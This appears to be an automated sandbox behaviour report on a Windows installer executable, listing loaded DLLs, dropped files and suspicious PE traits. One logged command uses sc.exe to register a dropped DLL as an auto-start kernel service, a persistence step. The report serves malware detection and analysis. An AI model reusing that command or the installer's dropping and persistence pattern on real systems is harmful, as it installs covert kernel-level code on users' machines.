Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: slc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: sfc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: sfc_os.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: explorerframe.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpWindow found: window name: TMainFormJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exeStatic file information: File size 5707417 > 1048576
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.1819516942.0000000003920000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.1819340678.0000000003720000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B557D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,10_2_00B557D0
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exeStatic PE information: real checksum: 0x0 should be: 0x57517c
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.5.drStatic PE information: real checksum: 0x0 should be: 0x343a15
Source: update.vac.1.drStatic PE information: real checksum: 0x0 should be: 0x379bd6
Source: update.vac.6.drStatic PE information: real checksum: 0x0 should be: 0x379bd6
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.0.drStatic PE information: real checksum: 0x0 should be: 0x343a15
Source: hrsw.vbc.6.drStatic PE information: real checksum: 0x0 should be: 0x379bd6
Source: tProtect.dll.12.drStatic PE information: real checksum: 0x1eb0f should be: 0xfc66
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.exeStatic PE information: section name: .didata
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.0.drStatic PE information: section name: .didata
Source: update.vac.1.drStatic PE information: section name: .00cfg
Source: update.vac.1.drStatic PE information: section name: .voltbl
Source: update.vac.1.drStatic PE information: section name: .=~
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp.5.drStatic PE information: section name: .didata
Source: 7zr.exe.6.drStatic PE information: section name: .sxdata
Source: update.vac.6.drStatic PE information: section name: .00cfg
Source: update.vac.6.drStatic PE information: section name: .voltbl
Source: update.vac.6.drStatic PE information: section name: .=~
Source: is-AQRNC.tmp.6.drStatic PE information: section name: .xdata
Source: hrsw.vbc.6.drStatic PE information: section name: .00cfg
Source: hrsw.vbc.6.drStatic PE information: section name: .voltbl
Source: hrsw.vbc.6.drStatic PE information: section name: .=~
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6C0C86EB push ecx; ret 6_2_6C0C86FE
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6BF70F00 push ss; retn 0001h6_2_6BF70F0A
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6C196F10 push eax; ret 6_2_6C196F2E
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6C0FB9F4 push 004AC35Ch; ret 6_2_6C0FBA0E
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6C197290 push eax; ret 6_2_6C1972BE
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00AD45F4 push 00B7C35Ch; ret 10_2_00AD460E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B6FB10 push eax; ret 10_2_00B6FB2E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B6FE90 push eax; ret 10_2_00B6FEBE
Source: update.vac.1.drStatic PE information: section name: .=~ entropy: 7.19316283520878
Source: update.vac.6.drStatic PE information: section name: .=~ entropy: 7.19316283520878
Source: hrsw.vbc.6.drStatic PE information: section name: .=~ entropy: 7.19316283520878
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpFile created: C:\Users\user\AppData\Local\Temp\is-V2BM7.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpFile created: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpFile created: C:\Program Files (x86)\Windows NT\trash (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpFile created: C:\Users\user\AppData\Local\Temp\is-V2BM7.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exeFile created: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeFile created: C:\Program Files (x86)\Windows NT\tProtect.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpFile created: C:\Users\user\AppData\Local\Temp\is-PMC4V.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpFile created: C:\Program Files (x86)\Windows NT\7zr.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpFile created: C:\Users\user\AppData\Local\Temp\is-PMC4V.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exeFile created: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpFile created: C:\Program Files (x86)\Windows NT\is-AQRNC.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpFile created: C:\Users\user\AppData\Local\Temp\is-V2BM7.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpFile created: C:\Users\user\AppData\Local\Temp\is-PMC4V.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpFile created: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
